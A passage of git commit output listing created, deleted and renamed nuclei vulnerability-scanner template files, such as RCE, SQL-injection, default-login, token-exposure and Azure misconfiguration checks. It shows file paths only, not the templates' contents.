nuclei-templates/Other/CNVD-2021-17369.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-30167-1.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-30167-2.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-49104.yaml create mode 100644 nuclei-templates/Other/CVE_2023_51467.yaml create mode 100644 nuclei-templates/Other/Confluence-SSRF.yaml rename nuclei-templates/Other/{dse855.yaml => DSE855.yaml} (100%) rename nuclei-templates/Other/{Dahua_getFaceCapture_Sqli.yaml => Dahua_Video_FileUpload.yaml} (100%) rename nuclei-templates/Other/{doccms-keyword-sqli.yaml => DocCMS-keyword-sqli.yaml} (100%) delete mode 100755 nuclei-templates/Other/Dotnetcms-SQLi.yaml create mode 100644 nuclei-templates/Other/Dynatrace-token.yaml rename nuclei-templates/Other/{empirecms-list-sqli.yaml => EmpireCMS-list-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/GLPI-9.3.3-SQL-Injection.yaml delete mode 100644 nuclei-templates/Other/GT-AC2900-login.yaml rename nuclei-templates/Other/{google-api-7772.yaml => Google-api.yaml} (100%) delete mode 100644 nuclei-templates/Other/Grafana-file-read.yaml rename nuclei-templates/Other/{Hikvision_Env_Information_Leakage.yaml => Hikvision_iVMS-8700_Fileupload_report.yaml} (100%) create mode 100644 nuclei-templates/Other/JBoss-SSRF.yaml create mode 100644 nuclei-templates/Other/JeeSite-default-login.yaml create mode 100644 nuclei-templates/Other/Jenkins-RCE.yaml rename nuclei-templates/Other/{kingdee-sqli.yaml => Kingdee-sqli.yaml} (100%) rename nuclei-templates/Other/{kingsoft-upload.yaml => Kingsoft-upload.yaml} (100%) rename nuclei-templates/Other/{magicflow-sqli.yaml => MagicFlow-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/Mailchimp-api.yaml create mode 100644 nuclei-templates/Other/Mailgun-api.yaml delete mode 100644 nuclei-templates/Other/Mantis-Default_login.yaml create mode 100644 nuclei-templates/Other/OpenTSDB-RCE-1.yaml create mode 100644 nuclei-templates/Other/OpenTSDB-RCE-2.yaml delete mode 100644 nuclei-templates/Other/Oracle-OAM-XSS.yaml create mode 100644 nuclei-templates/Other/PeopleSoft-XXE-1.yaml create mode 100644 nuclei-templates/Other/PeopleSoft-XXE-2.yaml delete mode 100644 nuclei-templates/Other/RCE-CVE-2021-41773.yaml delete mode 100644 nuclei-templates/Other/RedMine-Detect.yaml create mode 100644 nuclei-templates/Other/Redmine-Default-Login.yaml rename nuclei-templates/Other/{Ruijie_NBR_Router_fileupload.yaml => Ruijie_EXCU_SHELL.yaml} (100%) delete mode 100644 nuclei-templates/Other/SAP-NetWeaver-rce.yaml delete mode 100644 nuclei-templates/Other/Sap-redirect.yaml rename nuclei-templates/Other/{seagate-media-rce.yaml => Seagate-media-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/Shellshock-RCE-1.yaml create mode 100644 nuclei-templates/Other/Shopify-custom-token.yaml rename nuclei-templates/Other/{shopify-token.yaml => Shopify-token.yaml} (100%) rename nuclei-templates/Other/{slack-api-11864.yaml => Slack-api.yaml} (100%) create mode 100755 nuclei-templates/Other/SpringBoot-Heapdump.yaml delete mode 100644 nuclei-templates/Other/Springboot-Heapdump.yaml create mode 100755 nuclei-templates/Other/Springboot-Httptrace.yaml rename nuclei-templates/Other/{square-access-token.yaml => Square-access-token.yaml} (100%) rename nuclei-templates/Other/{square-oauth-secret.yaml => Square-oauth-secret.yaml} (100%) delete mode 100644 nuclei-templates/Other/SquirrelMail.yaml delete mode 100644 nuclei-templates/Other/Symantec-Messaging-Gateway.yaml delete mode 100644 nuclei-templates/Other/SymfonyRCE.yaml rename nuclei-templates/Other/{tenda-leakage.yaml => Tenda-leakage.yaml} (100%) delete mode 100755 nuclei-templates/Other/ThinkPHP-501-RCE.yaml create mode 100755 nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml delete mode 100644 nuclei-templates/Other/WSO2-2019-0598.yaml rename nuclei-templates/Other/{X-Host .yaml => X-Host.yaml} (100%) rename nuclei-templates/Other/{X-Remote-IP .yaml => X-Remote-IP.yaml} (100%) rename nuclei-templates/Other/{abyss-web-server-13.yaml => abyss-web-server.yaml} (100%) create mode 100644 nuclei-templates/Other/accent-microcomputers-lfi-14.yaml delete mode 100644 nuclei-templates/Other/accent-microcomputers-lfi-16.yaml rename nuclei-templates/Other/{access-log.yaml => access-log-22.yaml} (100%) create mode 100644 nuclei-templates/Other/accessibility-helper-xss-19.yaml delete mode 100644 nuclei-templates/Other/accessibility-helper-xss.yaml rename nuclei-templates/Other/{acme-xss-28.yaml => acme-xss-30.yaml} (100%) create mode 100644 nuclei-templates/Other/acquia-takeover-35.yaml delete mode 100644 nuclei-templates/Other/acquia-takeover.yaml rename nuclei-templates/Other/{acrolinx-dashboard.yaml => acrolinx-dashboard-36.yaml} (100%) delete mode 100644 nuclei-templates/Other/activemq-default-login-48.yaml create mode 100644 nuclei-templates/Other/activemq-default-login.yaml create mode 100644 nuclei-templates/Other/activemq-panel-50.yaml delete mode 100644 nuclei-templates/Other/activemq-panel-52.yaml create mode 100644 nuclei-templates/Other/activemq_apollo.yaml rename nuclei-templates/Other/{acunetix-panel-59.yaml => acunetix-panel-56.yaml} (100%) create mode 100644 nuclei-templates/Other/ad-widget-lfi-124.yaml delete mode 100644 nuclei-templates/Other/ad-widget-lfi-126.yaml create mode 100644 nuclei-templates/Other/adb-backup-enabled-61.yaml delete mode 100644 nuclei-templates/Other/adb-backup-enabled-62.yaml delete mode 100644 nuclei-templates/Other/addeventlistener-detect-64.yaml create mode 100644 nuclei-templates/Other/addeventlistener-detect-66.yaml delete mode 100644 nuclei-templates/Other/adiscon-loganalyzer.yaml create mode 100644 nuclei-templates/Other/admin-word-count-column-lfi-81.yaml delete mode 100644 nuclei-templates/Other/admin-word-count-column-lfi.yaml create mode 100644 nuclei-templates/Other/adminer-panel-75.yaml delete mode 100644 nuclei-templates/Other/adminer-panel-fuzz-73.yaml create mode 100644 nuclei-templates/Other/adminer-panel-fuzz.yaml delete mode 100644 nuclei-templates/Other/adminer-panel.yaml rename nuclei-templates/Other/{adobe-coldfusion-detect-83.yaml => adobe-coldfusion-detect-82.yaml} (100%) rename nuclei-templates/Other/{adobe-coldfusion-error-detect-86.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-component-login-89.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login-90.yaml delete mode 100644 nuclei-templates/Other/adobe-connect-central-login-93.yaml create mode 100644 nuclei-templates/Other/adobe-connect-central-login-97.yaml rename nuclei-templates/Other/{adobe-connect-username-exposure.yaml => adobe-connect-username-exposure-98.yaml} (100%) rename nuclei-templates/Other/{adobe-connect-version-102.yaml => adobe-connect-version.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-experience-manager-login-105.yaml delete mode 100644 nuclei-templates/Other/adobe-experience-manager-login-109.yaml create mode 100644 nuclei-templates/Other/adobe-media-server-112.yaml delete mode 100644 nuclei-templates/Other/adobe-media-server.yaml create mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-118.yaml delete mode 100644 nuclei-templates/Other/advanced-access-manager-lfi.yaml delete mode 100644 nuclei-templates/Other/aem-bg-servlet-127.yaml create mode 100644 nuclei-templates/Other/aem-bg-servlet-129.yaml rename nuclei-templates/Other/{aem-crx-bypass-134.yaml => aem-crx-bypass-132.yaml} (100%) rename nuclei-templates/Other/{aem-default-get-servlet.yaml => aem-default-get-servlet-139.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-default-login-140.yaml create mode 100644 nuclei-templates/Other/aem-default-login-141.yaml rename nuclei-templates/Other/{aem-detection.yaml => aem-detection-145.yaml} (100%) rename nuclei-templates/Other/{aem-gql-servlet-147.yaml => aem-gql-servlet-150.yaml} (100%) rename nuclei-templates/Other/{aem-groovyconsole-153.yaml => aem-groovyconsole.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-hash-querybuilder-160.yaml create mode 100644 nuclei-templates/Other/aem-hash-querybuilder.yaml create mode 100644 nuclei-templates/Other/aem-jcr-querybuilder-162.yaml delete mode 100644 nuclei-templates/Other/aem-jcr-querybuilder-164.yaml rename nuclei-templates/Other/{aem-merge-metadata-servlet.yaml => aem-merge-metadata-servlet-172.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-180.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-184.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet.yaml delete mode 100644 nuclei-templates/Other/aem-secrets.yaml create mode 100644 nuclei-templates/Other/aem-setpreferences-xss-189.yaml delete mode 100644 nuclei-templates/Other/aem-setpreferences-xss.yaml create mode 100644 nuclei-templates/Other/aem-userinfo-servlet-190.yaml delete mode 100644 nuclei-templates/Other/aem-userinfo-servlet-192.yaml delete mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml create mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml delete mode 100644 nuclei-templates/Other/aem-xss-childlist-selector-197.yaml create mode 100644 nuclei-templates/Other/aem-xss-childlist-selector.yaml delete mode 100644 nuclei-templates/Other/aerohive-netconfig-ui-201.yaml create mode 100644 nuclei-templates/Other/aerohive-netconfig-ui.yaml delete mode 100644 nuclei-templates/Other/aftership-takeover-203.yaml create mode 100644 nuclei-templates/Other/aftership-takeover-206.yaml rename nuclei-templates/Other/{agilecrm-takeover.yaml => agilecrm-takeover-209.yaml} (100%) delete mode 100644 nuclei-templates/Other/aha-takeover-214.yaml create mode 100644 nuclei-templates/Other/aha-takeover-216.yaml rename nuclei-templates/Other/{AIC-leakage.yaml => aic-leakage.yaml} (100%) delete mode 100644 nuclei-templates/Other/aims-password-mgmt-client-219.yaml create mode 100644 nuclei-templates/Other/aims-password-mgmt-client.yaml create mode 100644 nuclei-templates/Other/aims-password-portal-222.yaml delete mode 100644 nuclei-templates/Other/aims-password-portal-224.yaml delete mode 100644 nuclei-templates/Other/airflow-configuration-exposure-230.yaml create mode 100644 nuclei-templates/Other/airflow-configuration-exposure.yaml delete mode 100644 nuclei-templates/Other/airflow-debug-233.yaml create mode 100644 nuclei-templates/Other/airflow-debug.yaml create mode 100644 nuclei-templates/Other/airflow-default-login-236.yaml delete mode 100644 nuclei-templates/Other/airflow-default-login.yaml rename nuclei-templates/Other/{airflow-detect-240.yaml => airflow-detect-239.yaml} (100%) create mode 100644 nuclei-templates/Other/airflow-panel-242.yaml delete mode 100644 nuclei-templates/Other/airflow-panel-245.yaml rename nuclei-templates/Other/{Airflow-unauthorized.yaml => airflow-unauthorized.yaml} (100%) create mode 100644 nuclei-templates/Other/aj-report.yaml create mode 100644 nuclei-templates/Other/akamai-arl-xss-248.yaml delete mode 100644 nuclei-templates/Other/akamai-arl-xss-249.yaml rename nuclei-templates/Other/{akamai-cloudtest.yaml => akamai-cloudtest-254.yaml} (100%) delete mode 100644 nuclei-templates/Other/alfacgiapi-wordpress-256.yaml create mode 100644 nuclei-templates/Other/alfacgiapi-wordpress.yaml create mode 100644 nuclei-templates/Other/alfresco-detect-258.yaml delete mode 100644 nuclei-templates/Other/alfresco-detect-259.yaml rename nuclei-templates/Other/{Alibaba-Anyproxy-fileRead.yaml => alibaba-anyproxy-fileread.yaml} (100%) rename nuclei-templates/Other/{alibaba-canal-default-password.yaml => alibaba-canal-default-password-262.yaml} (100%) create mode 100644 nuclei-templates/Other/alphaweb-default-login-275.yaml delete mode 100644 nuclei-templates/Other/alphaweb-default-login-277.yaml rename nuclei-templates/Other/{amazon-docker-config.yaml => amazon-docker-config-280.yaml} (100%) create mode 100755 nuclei-templates/Other/amazon-mws-auth-token-11845.yaml delete mode 100644 nuclei-templates/Other/amazon-mws-auth-token-value.yaml rename nuclei-templates/Other/{amazon-mws-auth-token-283.yaml => amazon-mws-auth-token.yaml} (100%) create mode 100644 nuclei-templates/Other/ambari-default-login-287.yaml delete mode 100644 nuclei-templates/Other/ambari-default-login-290.yaml rename nuclei-templates/Other/{ambari-exposure-294.yaml => ambari-exposure-291.yaml} (100%) delete mode 100644 nuclei-templates/Other/amcrest-login-297.yaml create mode 100644 nuclei-templates/Other/amcrest-login.yaml rename nuclei-templates/Other/{ampps-admin-panel-306.yaml => ampps-admin-panel-305.yaml} (100%) rename nuclei-templates/Other/{ampps-dirlisting.yaml => ampps-dirlisting-308.yaml} (100%) delete mode 100644 nuclei-templates/Other/ampps-panel-309.yaml create mode 100644 nuclei-templates/Other/ampps-panel-310.yaml delete mode 100644 nuclei-templates/Other/android-debug-database-exposed-312.yaml create mode 100644 nuclei-templates/Other/android-debug-database-exposed.yaml rename nuclei-templates/Other/{anima-takeover.yaml => anima-takeover-317.yaml} (100%) rename nuclei-templates/Other/{Anni-fileDownload.yaml => anni-filedownload.yaml} (100%) rename nuclei-templates/Other/{announcekit-takeover-322.yaml => announcekit-takeover-324.yaml} (100%) delete mode 100644 nuclei-templates/Other/ansible-config-disclosure-326.yaml create mode 100644 nuclei-templates/Other/ansible-config-disclosure.yaml delete mode 100644 nuclei-templates/Other/ansible-semaphore-panel-327.yaml create mode 100644 nuclei-templates/Other/ansible-semaphore-panel.yaml delete mode 100644 nuclei-templates/Other/ansible-tower-exposure-331.yaml create mode 100644 nuclei-templates/Other/ansible-tower-exposure-332.yaml delete mode 100644 nuclei-templates/Other/antsword-backdoor-335.yaml create mode 100644 nuclei-templates/Other/antsword-backdoor.yaml rename nuclei-templates/Other/{AolynkBR304-weakPass.yaml => aolynkbr304-weakpass.yaml} (100%) rename nuclei-templates/Other/{APACHE-Ambari-weakPass.yaml => apache-ambari-weakpass.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-apisix-panel-336.yaml delete mode 100644 nuclei-templates/Other/apache-apisix-panel-337.yaml create mode 100644 nuclei-templates/Other/apache-detect-348.yaml delete mode 100644 nuclei-templates/Other/apache-detect.yaml create mode 100644 nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml rename nuclei-templates/Other/{apache-dubbo-detect-351.yaml => apache-dubbo-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-filename-enum-354.yaml delete mode 100644 nuclei-templates/Other/apache-filename-enum.yaml create mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-356.yaml delete mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-358.yaml rename nuclei-templates/Other/{apache-guacamole-361.yaml => apache-guacamole.yaml} (100%) rename nuclei-templates/Other/{default-cred-hertzbeat.yaml => apache-hertzbeat-default-login.yaml} (100%) rename nuclei-templates/Other/{apache-httpd-rce-362.yaml => apache-httpd-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-nifi-unauth.yaml create mode 100644 nuclei-templates/Other/apache-solr-file-read-368.yaml rename nuclei-templates/Other/{apache-solr-log4j-CVE-2021-44228.yaml => apache-solr-log4j-cve-2021-44228.yaml} (100%) rename nuclei-templates/Other/{apache-tomcat-CVE-2022-34305.yaml => apache-tomcat-cve-2022-34305.yaml} (100%) create mode 100644 nuclei-templates/Other/apachesolrlfissrf.yaml delete mode 100644 nuclei-templates/Other/apc-info-379.yaml create mode 100644 nuclei-templates/Other/apc-ups-login-381.yaml delete mode 100644 nuclei-templates/Other/apc-ups-login-382.yaml create mode 100644 nuclei-templates/Other/apc_info.yaml create mode 100644 nuclei-templates/Other/apeosport-v_c3375.yaml rename nuclei-templates/Other/{Apereo-Cas-rce.yaml => apereo-cas-rce.yaml} (100%) rename nuclei-templates/Other/{api-abstractapi.yaml => api-abstractapi-383.yaml} (100%) rename nuclei-templates/Other/{api-adafruit-io-387.yaml => api-adafruit-io.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-alienvault-390.yaml create mode 100644 nuclei-templates/Other/api-alienvault.yaml create mode 100644 nuclei-templates/Other/api-asana-393.yaml delete mode 100644 nuclei-templates/Other/api-asana.yaml delete mode 100644 nuclei-templates/Other/api-bingmaps-395.yaml create mode 100644 nuclei-templates/Other/api-bingmaps.yaml create mode 100644 nuclei-templates/Other/api-block-400.yaml delete mode 100644 nuclei-templates/Other/api-block.yaml create mode 100644 nuclei-templates/Other/api-calendly-404.yaml delete mode 100644 nuclei-templates/Other/api-calendly.yaml delete mode 100644 nuclei-templates/Other/api-clearbit-407.yaml create mode 100644 nuclei-templates/Other/api-clearbit.yaml rename nuclei-templates/Other/{api-cooperhewitt-411.yaml => api-cooperhewitt-409.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-debounce-414.yaml create mode 100644 nuclei-templates/Other/api-debounce.yaml create mode 100644 nuclei-templates/Other/api-deviantart.yaml create mode 100644 nuclei-templates/Other/api-dribbble-416.yaml delete mode 100644 nuclei-templates/Other/api-dribbble-417.yaml rename nuclei-templates/Other/{dropbox.yaml => api-dropbox-418.yaml} (100%) create mode 100644 nuclei-templates/Other/api-europeana-419.yaml delete mode 100644 nuclei-templates/Other/api-europeana.yaml rename nuclei-templates/Other/{api-facebook-422.yaml => api-facebook.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-festivo-425.yaml create mode 100644 nuclei-templates/Other/api-festivo.yaml rename nuclei-templates/Other/{api-fontawesome.yaml => api-fontawesome-426.yaml} (100%) rename nuclei-templates/Other/{api-fortitoken-cloud-427.yaml => api-fortitoken-cloud.yaml} (100%) create mode 100644 nuclei-templates/Other/api-google-drive-432.yaml delete mode 100644 nuclei-templates/Other/api-google-drive.yaml create mode 100644 nuclei-templates/Other/api-harvardart-433.yaml delete mode 100644 nuclei-templates/Other/api-harvardart-434.yaml rename nuclei-templates/Other/{api-heroku-435.yaml => api-heroku.yaml} (100%) create mode 100644 nuclei-templates/Other/api-hirak-rates-436.yaml delete mode 100644 nuclei-templates/Other/api-hirak-rates.yaml delete mode 100644 nuclei-templates/Other/api-hubspot-437.yaml rename nuclei-templates/Other/{api-iconfinder.yaml => api-iconfinder-438.yaml} (100%) create mode 100644 nuclei-templates/Other/api-improvmx-440.yaml delete mode 100644 nuclei-templates/Other/api-improvmx.yaml rename nuclei-templates/Other/{api-intercom.yaml => api-intercom-443.yaml} (100%) create mode 100644 nuclei-templates/Other/api-ipstack-444.yaml rename nuclei-templates/Other/{jumpcloud.yaml => api-jumpcloud.yaml} (100%) rename nuclei-templates/Other/{api-leanix.yaml => api-leanix-450.yaml} (100%) rename nuclei-templates/Other/{api-lokalise.yaml => api-lokalise-452.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-mailchimp.yaml rename nuclei-templates/Other/{api-malshare-457.yaml => api-malshare.yaml} (100%) create mode 100644 nuclei-templates/Other/api-malwarebazaar-458.yaml delete mode 100644 nuclei-templates/Other/api-malwarebazaar.yaml rename nuclei-templates/Other/{mapbox.yaml => api-mapbox-465.yaml} (100%) create mode 100644 nuclei-templates/Other/api-mojoauth-466.yaml delete mode 100644 nuclei-templates/Other/api-mojoauth.yaml delete mode 100644 nuclei-templates/Other/api-mywot-467.yaml create mode 100644 nuclei-templates/Other/api-mywot.yaml create mode 100644 nuclei-templates/Other/api-npm-471.yaml delete mode 100644 nuclei-templates/Other/api-npm.yaml delete mode 100644 nuclei-templates/Other/api-pastebin-477.yaml create mode 100644 nuclei-templates/Other/api-pastebin.yaml rename nuclei-templates/Other/{api-paypal.yaml => api-paypal-478.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-petfinder-480.yaml create mode 100644 nuclei-templates/Other/api-petfinder.yaml rename nuclei-templates/Other/{pivotaltracker.yaml => api-pivotaltracker-482.yaml} (100%) rename nuclei-templates/Other/{postmark.yaml => api-postmark-483.yaml} (100%) create mode 100644 nuclei-templates/Other/api-rijksmuseum-486.yaml delete mode 100644 nuclei-templates/Other/api-rijksmuseum.yaml delete mode 100644 nuclei-templates/Other/api-scanii-487.yaml create mode 100644 nuclei-templates/Other/api-scanii-488.yaml delete mode 100644 nuclei-templates/Other/api-spotify-495.yaml create mode 100644 nuclei-templates/Other/api-spotify.yaml delete mode 100644 nuclei-templates/Other/api-square-496.yaml create mode 100644 nuclei-templates/Other/api-square.yaml rename nuclei-templates/Other/{api-strava.yaml => api-strava-498.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-stytch-500.yaml create mode 100644 nuclei-templates/Other/api-stytch.yaml rename nuclei-templates/Other/{api-tink-504.yaml => api-tink.yaml} (100%) rename nuclei-templates/Other/{api-twitter-507.yaml => api-twitter.yaml} (100%) rename nuclei-templates/Other/{api-urlscan-508.yaml => api-urlscan.yaml} (100%) rename nuclei-templates/Other/{api-vercel.yaml => api-vercel-510.yaml} (100%) create mode 100644 nuclei-templates/Other/api-virustotal-512.yaml delete mode 100644 nuclei-templates/Other/api-virustotal.yaml rename nuclei-templates/Other/{visualstudio.yaml => api-visualstudio-513.yaml} (100%) rename nuclei-templates/Other/{wakatime.yaml => api-wakatime-514.yaml} (100%) rename nuclei-templates/Other/{api-youtube.yaml => api-youtube-519.yaml} (100%) rename nuclei-templates/Other/{apiman-panel-464.yaml => apiman-panel-462.yaml} (100%) delete mode 100644 nuclei-templates/Other/apisix-default-login-491.yaml create mode 100644 nuclei-templates/Other/apisix-default-login.yaml create mode 100644 nuclei-templates/Other/apollo-default-login-521.yaml delete mode 100644 nuclei-templates/Other/apollo-default-login.yaml create mode 100644 nuclei-templates/Other/apollo-server-detect-522.yaml delete mode 100644 nuclei-templates/Other/apollo-server-detect.yaml rename nuclei-templates/Other/{apple_app_site.yaml => apple-app-site-association-524.yaml} (100%) rename nuclei-templates/Other/{Application_level_dos.yaml => application_level_dos.yaml} (100%) create mode 100644 nuclei-templates/Other/application_security_gateway.yaml rename nuclei-templates/Other/{arcgis-panel-530.yaml => arcgis-panel-531.yaml} (100%) create mode 100644 nuclei-templates/Other/arcgis-rest-api-532.yaml delete mode 100644 nuclei-templates/Other/arcgis-rest-api-533.yaml create mode 100644 nuclei-templates/Other/argo_cd.yaml create mode 100644 nuclei-templates/Other/argocd-login-534.yaml delete mode 100644 nuclei-templates/Other/argocd-login.yaml rename nuclei-templates/Other/{artica-web-proxy-detect-544.yaml => artica-web-proxy-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/artifactory-anonymous-deploy.yaml create mode 100644 nuclei-templates/Other/artifactory_deploy.yaml create mode 100644 nuclei-templates/Other/aruba_instant.yaml rename nuclei-templates/Other/{asanhamayesh-lfi-553.yaml => asanhamayesh-lfi-552.yaml} (100%) create mode 100644 nuclei-templates/Other/aspose-file-download-561.yaml delete mode 100644 nuclei-templates/Other/aspose-file-download.yaml delete mode 100644 nuclei-templates/Other/aspose-ie-file-download-562.yaml create mode 100644 nuclei-templates/Other/aspose-ie-file-download-565.yaml create mode 100644 nuclei-templates/Other/aspose-pdf-file-download-568.yaml delete mode 100644 nuclei-templates/Other/aspose-pdf-file-download.yaml create mode 100644 nuclei-templates/Other/aspose-words-file-download-571.yaml delete mode 100644 nuclei-templates/Other/aspose-words-file-download-572.yaml create mode 100644 nuclei-templates/Other/aspx-debug-mode-577.yaml delete mode 100644 nuclei-templates/Other/aspx-debug-mode-578.yaml rename nuclei-templates/Other/{ASUSTOR-ADM-sqli.yaml => asustor-adm-sqli.yaml} (100%) rename nuclei-templates/Other/{ATHD-DVR-fileRead.yaml => athd-dvr-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/atlassian-crowd-panel-581.yaml delete mode 100644 nuclei-templates/Other/atlassian-crowd-panel.yaml create mode 100644 nuclei-templates/Other/aura_utility_services.yaml delete mode 100644 nuclei-templates/Other/autobahn-python-detect-593.yaml create mode 100644 nuclei-templates/Other/autobahn-python-detect-594.yaml rename nuclei-templates/Other/{automation-direct-596.yaml => automation-direct-597.yaml} (100%) create mode 100644 nuclei-templates/Other/avatier-password-management-604.yaml delete mode 100644 nuclei-templates/Other/avatier-password-management-605.yaml create mode 100644 nuclei-templates/Other/aviatrix-panel-608.yaml delete mode 100644 nuclei-templates/Other/aviatrix-panel.yaml rename nuclei-templates/Other/{AVideo-user-leakge.yaml => avideo-user-leakge.yaml} (100%) delete mode 100644 nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml create mode 100644 nuclei-templates/Other/avtech-avn801-camera-panel.yaml rename nuclei-templates/Other/{AVTECH-login-bypass.yaml => avtech-login-bypass.yaml} (100%) rename nuclei-templates/Other/{aws-access-id-620.yaml => aws-access-id-618.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-access-key-value-622.yaml delete mode 100644 nuclei-templates/Other/aws-access-key-value-625.yaml create mode 100644 nuclei-templates/Other/aws-cloudfront-service-634.yaml delete mode 100644 nuclei-templates/Other/aws-cloudfront-service.yaml delete mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml create mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml create mode 100644 nuclei-templates/Other/aws-redirect-652.yaml delete mode 100644 nuclei-templates/Other/aws-redirect-654.yaml create mode 100644 nuclei-templates/Other/axigen-webmail-662.yaml delete mode 100644 nuclei-templates/Other/axigen-webmail.yaml rename nuclei-templates/Other/{axiom-digitalocean-key-exposure-668.yaml => axiom-digitalocean-key-exposure-666.yaml} (100%) rename nuclei-templates/Other/{axis-happyaxis-669.yaml => axis-happyaxis-670.yaml} (100%) create mode 100644 nuclei-templates/Other/azkaban-default-login-671.yaml delete mode 100644 nuclei-templates/Other/azkaban-default-login-673.yaml rename nuclei-templates/Other/{azkaban-web-client.yaml => azkaban-web-client-677.yaml} (100%) create mode 100644 nuclei-templates/Other/azkaban.yaml create mode 100644 nuclei-templates/Other/azure-aks-api-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-aks-api-version-not-latest.yaml create mode 100644 nuclei-templates/Other/azure-aks-cni-not-configured.yaml create mode 100644 nuclei-templates/Other/azure-aks-entra-id-unintegrated.yaml create mode 100644 nuclei-templates/Other/azure-aks-kubernetes-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-aks-managed-identity-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-network-contrib-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-not-user-assigned.yaml create mode 100644 nuclei-templates/Other/azure-aks-rbac-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-aks-use-private-kv.yaml create mode 100644 nuclei-templates/Other/azure-apim-http2-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-apim-https-enforcement-missing.yaml create mode 100644 nuclei-templates/Other/azure-apim-nv-plaintext-exposure.yaml create mode 100644 nuclei-templates/Other/azure-apim-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-apim-resource-logs-not-configured.yaml create mode 100644 nuclei-templates/Other/azure-apim-system-assigned-identity-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-apim-tls-config-weak.yaml create mode 100644 nuclei-templates/Other/azure-apim-user-assigned-id-not-used.yaml create mode 100644 nuclei-templates/Other/azure-app-tier-cmk-untagged.yaml create mode 100644 nuclei-templates/Other/azure-app-tier-vm-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-appservice-always-on-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-auth-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-backup-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-backup-retention-missing.yaml create mode 100644 nuclei-templates/Other/azure-appservice-client-cert-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-entra-id-missing.yaml create mode 100644 nuclei-templates/Other/azure-appservice-ftp-deployment-disabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-ftps-only-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-http2-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-https-only-not-enforced.yaml create mode 100644 nuclei-templates/Other/azure-appservice-insights-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-remote-debugging-enabled.yaml create mode 100644 nuclei-templates/Other/azure-appservice-tls-latest-version-missing.yaml create mode 100644 nuclei-templates/Other/azure-blob-anonymous-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-immutable-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-lifecycle-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-service-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-blob-soft-delete-disabled.yaml create mode 100644 nuclei-templates/Other/azure-budget-alerts-missing.yaml create mode 100644 nuclei-templates/Other/azure-cosmosdb-auto-failover-missing.yaml create mode 100644 nuclei-templates/Other/azure-cosmosdb-default-network-access-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-custom-admin-role-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-custom-owner-role-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-database-tier-cmk-absent.yaml create mode 100644 nuclei-templates/Other/azure-db-mysql-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-defender-auto-provisioning-disabled.yaml create mode 100644 nuclei-templates/Other/azure-delete-lb-alert-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-diag-logs-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-diagnostic-categories-misconfigured.yaml create mode 100644 nuclei-templates/Other/azure-disk-encryption-unattached-volumes.yaml create mode 100644 nuclei-templates/Other/azure-entra-id-guest-users-unmonitored.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-access-keys-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-admin-privileges.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-appinsights-missing.yaml create mode 100644 